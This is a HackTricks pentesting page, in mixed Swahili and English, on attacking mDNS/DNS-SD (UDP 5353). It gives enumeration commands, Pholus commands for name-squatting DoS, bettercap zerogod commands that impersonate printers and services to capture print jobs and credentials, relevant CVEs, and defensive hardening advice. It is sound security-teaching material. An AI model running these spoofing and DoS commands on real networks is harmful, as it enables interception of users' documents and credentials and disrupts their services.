5353/UDP Multicast DNS (mDNS) and DNS-SD

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

Taarifa za Msingi

Multicast DNS (mDNS) inaruhusu utatuzi wa majina kama DNS na kugundua huduma ndani ya kiungo cha ndani (link-local) bila seva ya DNS ya unicast. Inatumia UDP/5353 na anwani za multicast 224.0.0.251 (IPv4) na FF02::FB (IPv6). DNS Service Discovery (DNS-SD, kawaida inayotumika pamoja na mDNS) hutoa njia iliyo sanifu ya kuorodhesha na kuelezea huduma kupitia rekodi za PTR, SRV na TXT.

PORT     STATE SERVICE
5353/udp open  zeroconf

Key protocol details you’ll often leverage during attacks:

• Majina katika eneo .local yanatatuliwa via mDNS.
• QU (Query Unicast) bit inaweza kuomba unicast replies hata kwa multicast questions.
• Implementations zinapaswa kupuuza packets zisizotokana na local link; baadhi ya stacks bado zinazikubali.
• Probing/announcing inahakikisha majina ya host/service ni ya kipekee; kuingilia hapa huunda hali za DoS/“name squatting”.

DNS-SD service model

Huduma zinatambulishwa kama _._tcp or _._udp chini ya .local, kwa mfano _ipp._tcp.local (printers), _airplay._tcp.local (AirPlay), _adb._tcp.local (Android Debug Bridge), n.k. Gundua types kwa kutumia _services._dns-sd._udp.local, kisha tatua instances zilizogunduliwa hadi SRV/TXT/A/AAAA.

Network Exploration and Enumeration

• nmap target scan (direct mDNS on a host):

nmap -sU -p 5353 --script=dns-service-discovery <target>

• nmap broadcast discovery (listen to the segment and enumerate all DNS-SD types/instances):

sudo nmap --script=broadcast-dns-service-discovery

• avahi-browse (Linux):

# List service types
avahi-browse -bt _services._dns-sd._udp
# Browse all services and resolve to host/port
avahi-browse -art

• Apple dns-sd (macOS):

# Browse all HTTP services
dns-sd -B _http._tcp
# Enumerate service types
dns-sd -B _services._dns-sd._udp
# Resolve a specific instance to SRV/TXT
dns-sd -L "My Printer" _ipp._tcp local

• Packet capture with tshark:

# Live capture
sudo tshark -i <iface> -f "udp port 5353" -Y mdns
# Only DNS-SD service list queries
sudo tshark -i <iface> -f "udp port 5353" -Y "dns.qry.name == \"_services._dns-sd._udp.local\""

Tip: Baadhi ya browsers/WebRTC hutumia ephemeral mDNS hostnames kuficha local IPs. Ikiwa unaona random-UUID.local candidates kwenye wire, tatua kwa mDNS ili pivot kwenda local IPs.

Attacks

mDNS name probing interference (DoS / name squatting)

Wakati wa probing phase, host huangalia uniqueness ya jina. Kujibu kwa spoofed conflicts kumeforce ichague majina mapya au kushindwa. Hii inaweza kuchelewesha au kuzuia service registration na discovery.

Example with Pholus:

# Block new devices from taking names by auto-faking responses
sudo python3 pholus3.py <iface> -afre -stimeout 1000

Udanganyifu wa huduma na kuiga (MitM)

Kuiga huduma zilizotangazwa za DNS-SD (vichapishaji, AirPlay, HTTP, ugawaji wa faili) ili kulazimisha wateja kuungana nawe. Hii ni muhimu hasa kwa:

• Kukamata hati kwa spoofing _ipp._tcp au _printer._tcp.
• Kuvutia wateja kwa huduma za HTTP/HTTPS ili kuchuma tokens/cookies au kuwasilisha payloads.
• Changanya na mbinu za NTLM relay wakati wateja wa Windows wanapofanya negotiate auth kwa huduma zilizodanganywa.

Kwa module ya bettercap zerogod (mDNS/DNS-SD spoofer/impersonator):

# Start mDNS/DNS-SD discovery
sudo bettercap -iface <iface> -eval "zerogod.discovery on"

# Show all services seen from a host
> zerogod.show 192.168.1.42
# Show full DNS records for a host (newer bettercap)
> zerogod.show-full 192.168.1.42

# Impersonate all services of a target host automatically
> zerogod.impersonate 192.168.1.42

# Save IPP print jobs to disk while impersonating a printer
> set zerogod.ipp.save_path ~/.bettercap/zerogod/documents/
> zerogod.impersonate 192.168.1.42

# Replay previously captured services
> zerogod.save 192.168.1.42 target.yml
> zerogod.advertise target.yml

Angalia pia generic LLMNR/NBNS/mDNS/WPAD spoofing na credential capture/relay workflows:

Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks

Vidokezo kuhusu matatizo ya utekelezaji ya hivi karibuni (inayofaa kwa DoS/persistence wakati wa uchunguzi)

• Avahi reachable-assertion and D-Bus crash bugs (2023) zinaweza kusitisha avahi-daemon kwenye distributions za Linux (mfano CVE-2023-38469..38473, CVE-2023-1981), zikivuruga service discovery kwenye mashine za lengo hadi zitakaporudiwa/restart.
• Cisco IOS XE Wireless LAN Controller mDNS gateway DoS (CVE-2024-20303) inaruhusu wateja wa WLAN wa jirani kufyeka mDNS zilizotengenezwa, ikiongeza matumizi ya CPU ya WLC na kukata tunnels za AP — ni muhimu ikiwa unahitaji kulazimisha client roaming au controller resets wakati wa uchunguzi.
• Apple mDNSResponder logic error DoS (CVE-2024-44183) inaruhusu mchakato wa ndani uliosandbox kusababisha crash ya Bonjour ili kwa muda mfupi kuzima service publication/lookup kwenye endpoints za Apple; imepatchiwa katika toleo za sasa za iOS/macOS.
• Apple mDNSResponder correctness issue (CVE-2025-31222) iliruhusu local privilege escalation kupitia mDNSResponder; yenye matumizi kwa persistence kwenye Macs/iPhones zisizosimamiwa, imerekebishwa katika masasisho ya hivi karibuni ya iOS/macOS.

Mambo ya kuzingatia kuhusu Browser/WebRTC na mDNS

Chromium/Firefox za kisasa huficha host candidates kwa majina ya mDNS ya nasibu. Unaweza kuonyesha tena LAN IPs kwenye endpoints zinazodhibitiwa kwa kusukuma sera ya Chrome WebRtcLocalIpsAllowedUrls (au kubadili chrome://flags/#enable-webrtc-hide-local-ips-with-mdns/Edge equivalent) ili ICE ionyeshe host candidates badala ya mDNS; weka kupitia HKLM\Software\Policies\Google\Chrome.

Wakati watumiaji wanapozimia ulinzi kwa mikono (kawaida katika mwongozo wa kutatua matatizo ya WebRTC), vivinjari vyao huanza kutangaza plain host candidates tena, ambazo unaweza kukamata kupitia mDNS au ICE signaling ili kuharakisha host discovery.

Defensive considerations and OPSEC

• Segment boundaries: Usiroute 224.0.0.251/FF02::FB kati ya security zones isipokuwa mDNS gateway inahitajika wazi. Ikiwa lazima uunganishe discovery, tumia allowlists na rate limits.
• Windows endpoints/servers:
• Ili kuzima kabisa name resolution kupitia mDNS, weka registry value na restart:

HKLM\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\EnableMDNS = 0 (DWORD)

• Katika mazingira yaliyosimamiwa, zima kanuni ya kujengwa ya “mDNS (UDP-In)” Windows Defender Firewall (angalau kwenye Domain profile) ili kuzuia inbound mDNS processing huku ukihifadhi utendakazi wa home/roaming.
• Kwenye builds mpya za Windows 11/GPO templates, tumia sera “Computer Configuration > Administrative Templates > Network > DNS Client > Configure multicast DNS (mDNS) protocol” na iweke Disabled.
• Linux (Avahi):
• Funga publishing wakati haitumiki: weka disable-publishing=yes, na zuia interfaces kwa allow-interfaces= / deny-interfaces= katika /etc/avahi/avahi-daemon.conf.
• Fikiria check-response-ttl=yes na epuka enable-reflector=yes isipokuwa inahitajika kabisa; pendelea reflect-filters= allowlists wakati wa reflecting.
• macOS: Zuia inbound mDNS kwenye host/network firewalls wakati Bonjour discovery haitohitajika kwa subnets maalum.
• Monitoring: Weka alarm kwa mwinuko usiotarajiwa wa maswali ya _services._dns-sd._udp.local au mabadiliko ya ghafla katika SRV/TXT ya huduma muhimu; haya ni viashiria vya spoofing au service impersonation.

Marejeo ya haraka ya zana

• nmap NSE: dns-service-discovery and broadcast-dns-service-discovery.
• Pholus: skana hai, reverse mDNS sweeps, DoS na spoofing helpers.

# Passive sniff (timeout seconds)
sudo python3 pholus3.py <iface> -stimeout 60
# Enumerate service types
sudo python3 pholus3.py <iface> -sscan
# Send generic mDNS requests
sudo python3 pholus3.py <iface> --request
# Reverse mDNS sweep of a subnet
sudo python3 pholus3.py <iface> -rdns_scanning 192.168.2.0/24

• bettercap zerogod: gundua, hifadhi, tangaza, na jifanya mDNS/DNS-SD services (tazama mifano hapo juu).

Spoofing/MitM

Shambulio lenye kuvutia zaidi unaloweza kufanya kupitia service hii ni kufanya MitM katika mawasiliano kati ya client na server halisi. Unaweza kupata faili nyeti (fanya MitM kwenye mawasiliano na printer) au hata credentials (Windows authentication).
Kwa taarifa zaidi angalia:

Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks

References

• Practical IoT Hacking: The Definitive Guide to Attacking the Internet of Things
• Nmap NSE: broadcast-dns-service-discovery
• bettercap zerogod (mDNS/DNS-SD discovery, spoofing, impersonation)
• Cisco IOS XE WLC mDNS gateway DoS (CVE-2024-20303) advisory
• Rapid7 advisory for Apple mDNSResponder CVE-2024-44183
• Rapid7 writeup of Apple mDNSResponder CVE-2025-31222

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.